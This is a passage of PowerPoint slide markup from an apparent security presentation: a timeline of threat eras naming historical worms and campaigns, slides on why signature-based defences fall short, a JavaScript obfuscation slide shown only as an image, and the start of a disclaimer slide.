          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="71B532">
              <a:alpha val="32000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="71B532"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="330200" dist="38100" algn="l" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prst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Threat Landscape Era’s</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Right Arrow 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="151539" y="709357"/>
            <a:ext cx="3768175" cy="2118678"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="71B532">
              <a:alpha val="32000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="71B532"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="330200" dist="38100" algn="l" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prst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510087" y="1487432"/>
            <a:ext cx="2328688" cy="619933"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="71B532">
              <a:alpha val="60000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="71B532">
                <a:alpha val="79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00" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Network Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1998-2005</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="279952" y="2420001"/>
            <a:ext cx="2648225" cy="1554272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:srgbClr val="71B532"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1"/>
              <a:t>Synflood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1"/>
              <a:t>Trinoo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>/TFN)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:srgbClr val="71B532"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Code Red</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:srgbClr val="71B532"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Slammer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:srgbClr val="71B532"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1"/>
              <a:t>Zotob</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:srgbClr val="71B532"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1"/>
              <a:t>Conficker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3366624" y="3520519"/>
            <a:ext cx="2223686" cy="2139047"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:srgbClr val="71B532"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Web Browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:srgbClr val="71B532"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Web Applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:srgbClr val="71B532"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Doc/PDF/etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:srgbClr val="71B532"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Flash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>/Shockwave</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:srgbClr val="71B532"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>Java</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:srgbClr val="71B532"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>Cyber Crime</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:srgbClr val="71B532"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>Storm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5566397" y="5191883"/>
            <a:ext cx="2531462" cy="1554272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:srgbClr val="71B532"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Aurora</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:srgbClr val="71B532"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Operation Payback</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:srgbClr val="71B532"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1"/>
              <a:t>Stuxnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>/Flame/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1"/>
              <a:t>Duqu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:srgbClr val="71B532"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>Operation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1" smtClean="0"/>
              <a:t>Ababil</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:srgbClr val="71B532"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rounded Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3633464" y="2647483"/>
            <a:ext cx="2328688" cy="619933"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="71B532">
              <a:alpha val="60000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="71B532">
                <a:alpha val="79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00" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Content &amp; Botnets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2006-2010</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Rounded Rectangle 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5743659" y="4287712"/>
            <a:ext cx="2328688" cy="619933"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="71B532">
              <a:alpha val="60000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="71B532">
                <a:alpha val="79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00" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Advanced Threats </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2010-Today</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="165839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7" grpId="0" animBg="1"/>
      <p:bldP spid="16" grpId="0"/>
      <p:bldP spid="22" grpId="0"/>
      <p:bldP spid="24"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41066"/>
            <a:ext cx="8489904" cy="523220"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Why Signatures Don’t Work</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Chart 6"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="371784541"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3809724" y="3124201"/>
          <a:ext cx="5029476" cy="3127132"/>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p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2992800" y="1787226"/>
            <a:ext cx="1621025" cy="1621025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1193800"/>
            <a:ext cx="5996944" cy="3828741"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="227013" indent="-227013" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="71B532"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3000" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="627063" indent="-282575" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="71B532"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2700" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1089025" indent="-174625" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="71B532"/>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Clr>
                <a:srgbClr val="71B532"/>
              </a:buClr>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Clr>
                <a:srgbClr val="71B532"/>
              </a:buClr>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t>Huge number of ‘ways in’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Drive By Download</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>SPAM/Phishing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Watering Hole</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Obfuscation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>USB</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Leveraging vulnerabilities in:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Java applets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Compound Documents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Anything Adobe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4267200" y="1193801"/>
            <a:ext cx="4572000" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Many Threat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Vectors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>New </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0"/>
              <a:t>AND</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Old</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>IPS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>/ AV Limited </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>coverage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Patching </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>lag</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14492297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New Threats? Just New Techniques!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1088702"/>
            <a:ext cx="8229600" cy="5037461"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attackers will always choose to obfuscate vs. finding a new attack vector</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="796083" y="2292871"/>
            <a:ext cx="7721130" cy="35497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28789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8687"/>
            <a:ext cx="9144000" cy="584776"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Case-in-Point: JavaScript Obfuscation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect r="34931" b="23263"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="437442" y="912189"/>
            <a:ext cx="8269116" cy="5294233"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27818322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2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="63500" y="0"/>
            <a:ext cx="9004751" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23283797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Disclaimer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="328371" y="1017588"/>
            <a:ext cx="8489904" cy="5003068"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The Good</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We still have friends in these industries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We still (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>kinda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) believe in (some) much of the underlying technology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The Good &amp; The Bad</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Each product &amp; technology is good and bad at certain aspects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Some are better than others</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
